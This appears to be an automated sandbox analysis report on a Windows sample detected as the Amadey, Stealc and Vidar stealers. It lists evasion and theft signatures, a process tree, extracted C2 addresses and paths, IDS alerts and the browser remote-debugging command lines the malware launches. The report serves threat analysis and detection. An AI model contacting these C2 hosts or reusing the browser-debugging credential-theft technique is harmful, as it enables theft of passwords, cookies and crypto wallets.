Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1562762
MD5:	ae62896aac2820ebe9235b01b2370128
SHA1:	676a436318647235e6068e3e56408491c4ae46d1
SHA256:	78f8f56de1d7fe369fa9b7dfdf52d43af4ed2abb6ba0a05cd8adbdbf078ca405
Tags:	exeuser-Bitsight
Infos:

Detection

Amadey, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files to the document folder of the user

Drops PE files to the user root directory

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

Maps a DLL or memory area into another process

Monitors registry run keys for changes

PE file contains section with special chars

Potentially malicious time measurement code found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the user directory

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

PE file does not import any functions

PE file overlay found

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Browser Started with Remote Debugging

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 4592 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AE62896AAC2820EBE9235B01B2370128)

chrome.exe (PID: 7128 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 5028 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=2204,i,16016120249375417697,2229644558360442611,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

msedge.exe (PID: 7956 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 8164 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2264,i,13353248291220899786,2148692624632142094,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)

cmd.exe (PID: 9008 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsDBKKKEHDHC.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

DocumentsDBKKKEHDHC.exe (PID: 9024 cmdline: "C:\Users\user\DocumentsDBKKKEHDHC.exe" MD5: 60345799039B0C985D836024C003B152)

skotes.exe (PID: 5728 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 60345799039B0C985D836024C003B152)

msedge.exe (PID: 7404 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 1916 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2740 --field-trial-handle=2068,i,10168677201670927820,4631142609524840128,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 7276 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6440 --field-trial-handle=2068,i,10168677201670927820,4631142609524840128,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 6564 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6604 --field-trial-handle=2068,i,10168677201670927820,4631142609524840128,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)

identity_helper.exe (PID: 8564 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6900 --field-trial-handle=2068,i,10168677201670927820,4631142609524840128,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)

identity_helper.exe (PID: 8596 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6900 --field-trial-handle=2068,i,10168677201670927820,4631142609524840128,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)

msedge.exe (PID: 8132 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6028 --field-trial-handle=2068,i,10168677201670927820,4631142609524840128,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)

skotes.exe (PID: 1208 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 60345799039B0C985D836024C003B152)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2719068067.00000000000F1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001C.00000003.2708124358.0000000005270000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001B.00000003.2672554775.0000000004A30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001B.00000002.2714825632.0000000000A71000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000020.00000002.3409408672.0000000000A61000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.2720777420.000000000109E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000020.00000003.3282486940.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.2160777148.0000000004E40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001C.00000002.2748369916.0000000000A61000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Process Memory Space: file.exe PID: 4592	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 4592	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 4592	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 4592	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author
32.2.skotes.exe.a60000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
27.2.DocumentsDBKKKEHDHC.exe.a70000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
28.2.skotes.exe.a60000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Sigma Signatures

System Summary

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4592, ParentProcessName: file.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", ProcessId: 7128, ProcessName: chrome.exe

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T00:25:14.567471+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.6	49715	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T00:25:14.444588+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.6	49715	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T00:25:14.896173+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.6	49715	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T00:25:16.356531+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.6	49715	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T00:25:15.019928+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.6	49715	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T00:25:13.994828+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.6	49715	185.215.113.206	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T00:27:06.296496+0100	2856147	1	A Network Trojan was detected	192.168.2.6	50101	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T00:25:03.194035+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.6	50108	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T00:27:10.840055+0100	2803305	3	Unknown Traffic	192.168.2.6	50112	31.41.244.11	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T00:25:17.086882+0100	2803304	3	Unknown Traffic	192.168.2.6	49715	185.215.113.206	80	TCP
2024-11-26T00:25:40.611919+0100	2803304	3	Unknown Traffic	192.168.2.6	49795	185.215.113.206	80	TCP
2024-11-26T00:25:42.540264+0100	2803304	3	Unknown Traffic	192.168.2.6	49795	185.215.113.206	80	TCP
2024-11-26T00:25:43.878951+0100	2803304	3	Unknown Traffic	192.168.2.6	49795	185.215.113.206	80	TCP
2024-11-26T00:25:45.002968+0100	2803304	3	Unknown Traffic	192.168.2.6	49795	185.215.113.206	80	TCP
2024-11-26T00:25:48.636589+0100	2803304	3	Unknown Traffic	192.168.2.6	49795	185.215.113.206	80	TCP
2024-11-26T00:25:49.714057+0100	2803304	3	Unknown Traffic	192.168.2.6	49795	185.215.113.206	80	TCP
2024-11-26T00:25:55.803815+0100	2803304	3	Unknown Traffic	192.168.2.6	49930	185.215.113.16	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.206/68b591d6548ec281/freebl3.dllj7	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php~u	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpKEHDHC.exeata;	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpgPreference.Verbt	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/mozglue.dllN7	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/msvcp140.dll9	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000001C.00000003.2708124358.0000000005270000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 00000000.00000002.2720777420.000000000109E000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAEA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6CAEA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE44C0 PK11_PubEncrypt,	0_2_6CAE44C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAB4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6CAB4420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE4440 PK11_PrivDecrypt,	0_2_6CAE4440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB325B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6CB325B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CACE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6CACE6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAC8670 PK11_ExportEncryptedPrivKeyInfo,	0_2_6CAC8670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAEA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	0_2_6CAEA650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB0A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	0_2_6CB0A730
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB10180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	0_2_6CB10180
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE43B0 PK11_PubEncryptPKCS1,PR_SetError,	0_2_6CAE43B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB07C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	0_2_6CB07C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB0BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	0_2_6CB0BD30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAC7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	0_2_6CAC7D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB09EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	0_2_6CB09EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE3FF0 PK11_PrivDecryptPKCS1,	0_2_6CAE3FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	0_2_6CAE9840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	0_2_6CAE3850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB0DA40 SEC_PKCS7ContentIsEncrypted,	0_2_6CB0DA40

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 20.190.177.146:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.35.26:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.35.26:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.6:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49800 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.58.43:443 -> 192.168.2.6:49853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.58.43:443 -> 192.168.2.6:49854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.58.43:443 -> 192.168.2.6:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.16.158.83:443 -> 192.168.2.6:49879 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49882 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49885 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.6:49965 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.58.43:443 -> 192.168.2.6:49980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49984 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:50068 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:50092 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2749300757.00000000733BD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: Re.PDB source: 2cc80dabc69f58b6_1.8.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2749300757.00000000733BD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
